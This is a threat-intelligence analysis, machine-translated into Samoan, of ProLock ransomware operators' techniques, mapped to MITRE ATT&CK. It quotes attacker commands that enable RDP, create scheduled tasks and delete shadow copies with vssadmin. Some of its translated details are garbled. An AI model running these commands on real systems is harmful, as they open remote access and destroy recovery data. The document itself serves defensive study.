O le manuia o osofaʻiga a le ransomware i faʻalapotopotoga i le lalolagi atoa o loʻo faʻaosofia ai le tele ma le tele o osofaʻiga fou e ulufale atu i le taʻaloga. O se tasi o nei tagata taaalo fou o se vaega o loʻo faʻaaogaina le ProLock ransomware. Na aliali mai ia Mati 2020 o le sui o le polokalame PwndLocker, lea na amata galue i le faaiuga o le 2019. O osofa'iga a le ProLock ransomware e fa'atatau i fa'alapotopotoga tau tupe ma soifua maloloina, lala sooupu a le malo, ma le vaega fa'atau. Talu ai nei, na osofaʻia ma le manuia e le aufaipisinisi a le ProLock se tasi o kamupani sili ona tele ATM, Diebold Nixdorf.
I lenei pou Oleg Skulkin, ta'ita'i fa'apitoa o le Computer Forensics Laboratory of Group-IB, e aofia ai faiga faʻavae, metotia ma faʻagasologa (TTPs) faʻaaogaina e le ProLock operators. E fa'ai'u le tusiga i se fa'atusatusaga i le MITER ATT&CK Matrix, o se fa'amaumauga a le lautele o lo'o tu'ufa'atasia fa'atatau osofa'iga fa'aogaina e le tele o vaega fa'akomepiuta i luga ole laiga.
Maua muamua avanoa
O lo'o fa'aogaina e le aufaipisinisi a le ProLock ni ve'a autu se lua o le fetuutuuna'i muamua: o le QakBot (Qbot) Trojan ma le 'au'aunaga RDP e le'i puipuia ma fa'ailoga vaivai.
O le fetuutuuna'i e ala i se 'au'aunaga RDP e mafai ona maua i fafo e sili ona ta'uta'ua i le va'aiga ransomware. E masani lava, e faʻatau e tagata osofaʻi le avanoa i se 'auʻaunaga faʻafefeteina mai isi vaega, ae mafai foi ona maua e tagata o le vaega na o latou lava.
O se mea e sili atu ona manaia o le fetuutuunai muamua o le QakBot malware. I le taimi muamua, o lenei Trojan na fesoʻotaʻi ma se isi aiga o ransomware - MegaCortex. Ae ui i lea, ua faʻaaogaina nei e ProLock operators.
E masani lava, o QakBot e tufatufa atu e ala i faʻasalalauga faʻamalosi. O se imeli phishing e mafai ona i ai se pepa Microsoft Office faʻapipiʻi poʻo se fesoʻotaʻiga i se faila o loʻo i totonu o se tautua teu oloa, pei ole Microsoft OneDrive.
O loʻo i ai foʻi mataupu faʻapitoa o QakBot o loʻo utaina i se isi Trojan, Emotet, lea e lauiloa mo lona auai i faʻasalalauga na tufatufaina atu le Ryuk ransomware.
Faatinoga
A mae'a ona la'uina ma tatala se pepa fa'ama'i, e fa'atonu le tagata fa'aoga e fa'ataga macros e fa'agasolo. Afai e manuia, ua faʻalauiloa le PowerShell, lea o le a faʻatagaina oe e sii mai ma faʻatautaia le uta o QakBot mai le faʻatonuga ma le faʻatonuina o le server.
E taua le maitauina o le mea lava e tasi e faʻatatau i le ProLock: o le uta e maua mai le faila BMP poʻo JPG ma uta i le mafaufau e faʻaaoga ai le PowerShell. I nisi tulaga, e faʻaaogaina se galuega faʻatulagaina e amata ai le PowerShell.
Batch script o loʻo faʻaogaina le ProLock e ala i le faʻatulagaina o galuega:
schtasks.exe /CREATE /XML C:ProgramdataWinMgr.xml /tn WinMgr
schtasks.exe /RUN /tn WinMgr
del C:ProgramdataWinMgr.xml
del C:Programdatarun.batFa'atasi i le faiga
Afai e mafai ona faʻafefeteina le RDP server ma maua avanoa, ona faʻaaogaina lea o tala faʻamaonia e maua ai le avanoa i le fesoʻotaʻiga. QakBot o loʻo faʻaalia i le tele o auala faʻapipiʻi. O le tele o taimi, e faʻaaogaina e lenei Trojan le Run registry key ma fatuina galuega i le scheduler:
Fa'amauina Qakbot i le faiga e fa'aaoga ai le ki fa'amaufa'ailoga Run
I nisi tulaga, o loʻo faʻaogaina foʻi faila amata: o loʻo tuʻuina iina se ala 'alo e faʻasino i le bootloader.
Puipuiga ole pasi
E ala i le fesoʻotaʻi ma le faʻatonuga ma le faʻatonuina o le server, QakBot e taumafai e faʻafouina ia lava, ina ia aloese mai le suʻesuʻeina, e mafai e le malware ona suia lana lava faʻasologa o loʻo iai nei i se mea fou. O faila fa'atino e saini i se saini fa'aleaga pe fa'asese. O le uta muamua na utaina e le PowerShell o lo'o teuina i luga o le C&C server ma le fa'aopoopoga PNG. E le gata i lea, a maeʻa le faʻataunuʻuina e suia i se faila talafeagai calc.exe.
E le gata i lea, e natia ai gaioiga leaga, e faʻaaogaina e QakBot le metotia o le tuiina o le code i faiga, faʻaaoga explorer.exe.
E pei ona taʻua, o le ProLock payload o loʻo natia i totonu o le faila BMP poʻo JPG. E mafai foi ona manatu lenei mea o se auala e faʻafefe ai le puipuiga.
Mauaina o fa'amaoniga
QakBot o loʻo i ai galuega faʻaoga keylogger. E le gata i lea, e mafai ona sii mai ma faʻagasolo faʻamatalaga faaopoopo, mo se faʻataʻitaʻiga, Invoke-Mimikatz, o le PowerShell version o le lauiloa Mimikatz aoga. O ia tusitusiga e mafai ona faʻaogaina e tagata osofaʻi e lafoaʻi faʻamaoniga.
Fa'amatalaga feso'ota'iga
A maeʻa ona maua avanoa i faʻamatalaga faʻapitoa, e faʻatino e le aufaipisinisi ProLock le suʻesuʻeina o fesoʻotaiga, lea e ono aofia ai le suʻesuʻeina o le taulaga ma le auiliiliga o le Active Directory environment. I le faaopoopo atu i tusitusiga eseese, o loʻo faʻaogaina e le au osofaʻi le AdFind, o se isi meafaigaluega lauiloa i vaega ransomware, e aoina faʻamatalaga e uiga i Active Directory.
Fa'alauiloa feso'otaiga
I le masani ai, o se tasi o auala sili ona lauiloa o le faʻalauiloaina o fesoʻotaʻiga o le Remote Desktop Protocol. ProLock e leai se faʻalavelave. O loʻo i ai i le au osofaʻi ni tusitusiga i totonu o latou auupega e maua ai le avanoa mamao e ala i le RDP e faʻatatau i 'au.
BAT tusitusiga mo le mauaina o avanoa e ala i le RDP protocol:
reg add "HKLMSystemCurrentControlSetControlTerminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="Remote Desktop" new enable=yes
reg add "HKLMSystemCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v "UserAuthentication" /t REG_DWORD /d 0 /f
Mo le faʻatinoina mamao o tusitusiga, e faʻaogaina e le aufaipisinisi ProLock se isi meafaigaluega lauiloa, le aoga PsExec mai le Sysinternals Suite.
ProLock o loʻo tamomoe i luga o 'au e faʻaaoga ai le WMIC, o se laina laina faʻatonuga mo le galue ma le Windows Management Instrumentation subsystem. O lenei meafaigaluega ua faʻateleina foʻi le lauiloa i le ransomware operators.
aoina o fa'amaumauga
E pei o le tele o isi ransomware operators, o le vaega o loʻo faʻaaogaina ProLock e aoina faʻamaumauga mai se fesoʻotaʻiga faʻafefeteina e faʻateleina ai o latou avanoa e maua ai se tau. Aʻo leʻi faʻauluina, o faʻamaumauga na aoina e teuina i le faʻaaogaina o le 7Zip aoga.
Exfiltration
Ina ia tuʻuina atu faʻamaumauga, e faʻaaogaina e le aufaipisinisi ProLock le Rclone, o se meafaigaluega laina faʻatonu e faʻatulagaina e faʻamaopoopo faila ma auaunaga eseese o le teuina o ao e pei o OneDrive, Google Drive, Mega, ma isi. Attackers e masani ona toe faʻaigoaina le faila faila ina ia foliga mai o faila faila talafeagai.
E le pei o latou tupulaga, ProLock operators e le o iai lava a latou lava upega tafaʻilagi e faʻasalalau ai faʻamatalaga gaoia a kamupani na mumusu e totogi le tau.
Ausia le sini mulimuli
O le taimi lava e aveese ai faʻamatalaga, e faʻapipiʻi e le 'au le ProLock i totonu o le atinaʻe fesoʻotaʻiga. O le faila binary e maua mai se faila ma le faʻaopoopoga PNG poʻo JPG faʻaaoga le PowerShell ma tui i le mafaufau:
Muamua lava, o le ProLock e faʻamutaina faiga faʻamaonia i totonu o le lisi o loʻo fausia (maofa, e naʻo le faʻaaogaina o mataitusi e ono o le igoa o le faagasologa, e pei o le "winwor"), ma faʻamutaina auaunaga, e aofia ai mea e fesoʻotaʻi ma le saogalemu, e pei o le CSFalconService ( CrowdStrike Falcon). fa'aaoga le fa'atonuga upega tafaoga.
Ma, pei o le tele o isi ransomware aiga, faʻaaogaina e tagata osofaʻi vssadmin e tape kopi ata o Windows ma faʻatapulaʻa lo latou lapopoa ina ia le faia ni kopi fou:
vssadmin.exe delete shadows /all /quiet
vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB
vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=unboundedProLock faʻaopoopo faʻaopoopoga .proLock, .pr0Loka poʻo .proL0ck i faila fa'ailoga ta'itasi ma tu'u le faila [E FAAPEFEA E TOE LELEI FAI] TXT i faila taitasi. O lenei faila o loʻo i ai faʻatonuga i le auala e faʻafefe ai faila, e aofia ai se fesoʻotaʻiga i se nofoaga e tatau ona ulufale ai le tagata manua i se ID tulaga ese ma maua faʻamatalaga totogi:
O faʻataʻitaʻiga taʻitasi o ProLock o loʻo i ai faʻamatalaga e uiga i le tau o le tau - i lenei tulaga, 35 bitcoins, e tusa ma le $ 312.
iʻuga
Ole tele o ransomware operators latou te fa'aogaina auala tutusa e ausia ai a latou sini. I le taimi lava e tasi, o nisi metotia e tulaga ese i vaega taʻitasi. I le taimi nei, o loʻo faʻatupulaʻia le numera o vaega faʻasalalau i luga ole laiga o loʻo faʻaaogaina ransomware ia latou faʻasalalauga. I nisi tulaga, e mafai ona a'afia le aufaipisinisi e tasi i osofa'iga e fa'aaoga ai aiga eseese o ransomware, o lea o le a fa'atupula'ia ai le va'aia o le fa'aogaina o auala, metotia ma faiga fa'aoga.
Fa'afanua ile MITER ATT&CK Fa'afanua
Tauvaga
faiga
Avanoa Muamua (TA0001)
Au'aunaga Mamao i fafo (T1133), Fa'apipi'i Spearphishing (T1193), Feso'ota'iga Spearphishing (T1192)
Fa'ataunu'u (TA0002)
Powershell (T1086), Fa'amatalaga (T1064), Fa'atinoina o Tagata (T1204), Mea Fa'atonu Pupuni (T1047)
Tumau (TA0003)
Resitala Fa'agaoioi Ki / Fa'amataga Folder (T1060), Galuega Fa'atulagaina (T1053), Fa'amatalaga Fa'amaonia (T1078)
Puipuia le Puipuia (TA0005)
Fa'ailoga Fa'ailoga (T1116), Fa'a'ese'ese/ Fa'ailoga Faila po'o Fa'amatalaga (T1140), Fa'agata Meafaigaluega Saogalemu (T1089), Fa'amalo Faila (T1107), Fa'afoliga (T1036), Fa'agasologa o le tui (T1055)
Avanoa Fa'amaonia (TA0006)
Lafoa'iina o Fa'amatalaga (T1003), Malosi'i (T1110), Pu'e Fa'aulu (T1056)
Su'esu'e (TA0007)
Su'esu'ega Fa'amatalaga (T1087), Su'esu'ega Fa'atauva'a (T1482), Su'esu'ega Faila ma Fa'atonu (T1083), Su'esu'eina Au'aunaga Feso'ota'i (T1046), Su'esu'ega Fetufa'i Fegalegaleai (T1135), Su'esu'ega Fa'atonuga mamao (T1018)
Gaioiga Lateral (TA0008)
Polokalama Papamaa Mamao (T1076), Kopi File Mamao (T1105), Fa'asoa Pule Pupuni (T1077)
Aoina (TA0009)
Fa'amatalaga mai le Fa'alapotopotoga Fa'alotoifale (T1005), Fa'amatalaga mai le Network Shared Drive (T1039), Fa'atonu Fa'amaumauga (T1074)
Poloaiga ma Pulea (TA0011)
Taulaga Fa'aaoga masani (T1043), Auaunaga i luga ole laiga (T1102)
Ave'esea (TA0010)
Fa'amauina Fa'amatalaga (T1002), Fa'aliliuina Fa'amatalaga i le Teugatupe Ao (T1537)
A'afiaga (TA0040)
Fa'ailoga Fa'amatalaga mo A'afiaga (T1486), Taofi le Toe Fa'aleleia (T1490)
puna: www.habr.com